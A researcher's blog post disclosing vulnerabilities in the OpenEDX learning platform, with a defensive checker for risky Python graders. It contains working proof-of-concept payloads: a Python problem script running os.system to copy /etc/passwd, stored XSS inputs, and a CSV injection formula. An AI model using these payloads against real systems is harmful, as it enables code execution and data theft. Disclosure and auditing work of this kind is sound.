How I found a Remote Code Execution in OpenEDX
The OpenEDX platform is a really cool Learning Management System, which is also open source (this time I was testing the Ironwood release 2.5). You can check it out here: https://open.edx.org/the-platform/ While I was using it, I decided to check its security. So I followed my normal approach: first mapping the app and writing down which functionalities it had, then blackbox testing, and then whitebox.
As you can see here: https://github.com/edx/edx-platform the whole platform is written in Python (in which I don't have much experience reviewing code). So I decided to go completely blackbox this time. As I really needed to know all the functionalities in depth, I went to the official documentation:
https://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/latest/index.html
So after some time digging in the docs I found this:
It turns out that if you create an account on an OpenEDX platform instance, go to the Studio, create a Course, create a Unit in the course and add a Problem, then choose Custom Python-Evaluated problem and use a payload such as:
<problem>
<script type="python">
def test_add(expect,ans):
os.system("cat /etc/passwd > /tmp/test_rce")
</script>
<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
<textline size="10" correct_answer="11" label="Integer #1"/><br/>
<textline size="10" correct_answer="9" label="Integer #2"/>
</customresponse>
<solution>
<div class="detailed-solution">
<p>Solution or Explanation Heading</p>
<p>Solution or explanation text</p>
</div>
</solution>
</problem>
and click the Submit button, you can execute code on the machine.
When I discovered this, I contacted EDX's security team and they told me that there is a mitigation for this kind of issue, but it is not enabled by default:
https://github.com/edx/codejail
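Until CodeJail is enabled, a course operator can at least audit exported problem XML for Python-evaluated graders that reach outside the grading logic, which is exactly what the payload above does. The static checker below is an added example, not part of the original post or the edX code base; the watchlist of modules and builtins is an assumption, and the two sample problems are constructed.

```python
"""Flag <script type="python"> blocks in OLX problems that touch the host."""
import ast
import xml.etree.ElementTree as ET

# Assumed watchlist: a grader function has no reason to use these.
RISKY_MODULES = {"os", "subprocess", "sys", "socket", "shutil", "importlib", "ctypes"}
RISKY_CALLS = {"open", "eval", "exec", "__import__", "compile"}


def audit_problem(olx):
    """Return a list of human-readable findings for one <problem> document."""
    findings = []
    root = ET.fromstring(olx)
    for script in root.iter("script"):
        if script.get("type") != "python":
            continue
        try:
            tree = ast.parse(script.text or "")
        except SyntaxError as exc:
            findings.append(f"unparseable python script: {exc.msg}")
            continue
        for node in ast.walk(tree):
            if isinstance(node, ast.Import):
                mods = [alias.name.split(".")[0] for alias in node.names]
            elif isinstance(node, ast.ImportFrom):
                mods = [(node.module or "").split(".")[0]]
            else:
                mods = []
            for mod in mods:
                if mod in RISKY_MODULES:
                    findings.append(f"line {node.lineno}: imports {mod}")
            # The payload in the post never imports os; it relies on the
            # execution namespace already having it, so check attribute use too.
            if (isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name)
                    and node.value.id in RISKY_MODULES):
                findings.append(f"line {node.lineno}: uses {node.value.id}.{node.attr}")
            if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                    and node.func.id in RISKY_CALLS):
                findings.append(f"line {node.lineno}: calls {node.func.id}()")
    return findings


# Constructed samples: a legitimate grader and one shaped like the payload above.
BENIGN_PROBLEM = """<problem><script type="python">
def test_add(expect, ans):
    return int(ans) == int(expect)
</script><customresponse cfn="test_add" expect="20"/></problem>"""

SUSPECT_PROBLEM = """<problem><script type="python">
def test_add(expect, ans):
    os.system("uname -a > /tmp/marker")
</script><customresponse cfn="test_add" expect="20"/></problem>"""
```

Run it over every problem XML in a course export; a clean course yields no findings, while the suspect sample is reported as `line 3: uses os.system`.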
Apart from this vulnerability I also found a stored XSS: in EDX STUDIO > CONTENT > FILE UPLOADS, upload an SVG file containing XSS. And also 2 more XSS:
1) EDX STUDIO > COURSENAME > CONTENT > UPDATES > Press the edit button and replace the default content with <img src=x onerror=alert(0)>
2) Finally in EDX STUDIO>COURSENAME>SETTINGS>
Finally, I found a CSV injection as well:
Course > Instructor > Cohorts > Add cohort with the payload (ex: =cmd|' /C notepad'!'A1') > Add your user to the cohort. Then Course > Data Downloads > Reports > Download profile info as CSV > the file is generated below; open it in Excel 2016 via Data > Import data from file > Choose CSV > Using comma as delimiter.
So, that was all for today. Please make sure you enable CodeJail when using the OpenEDX platform. Thanks for reading the post ;)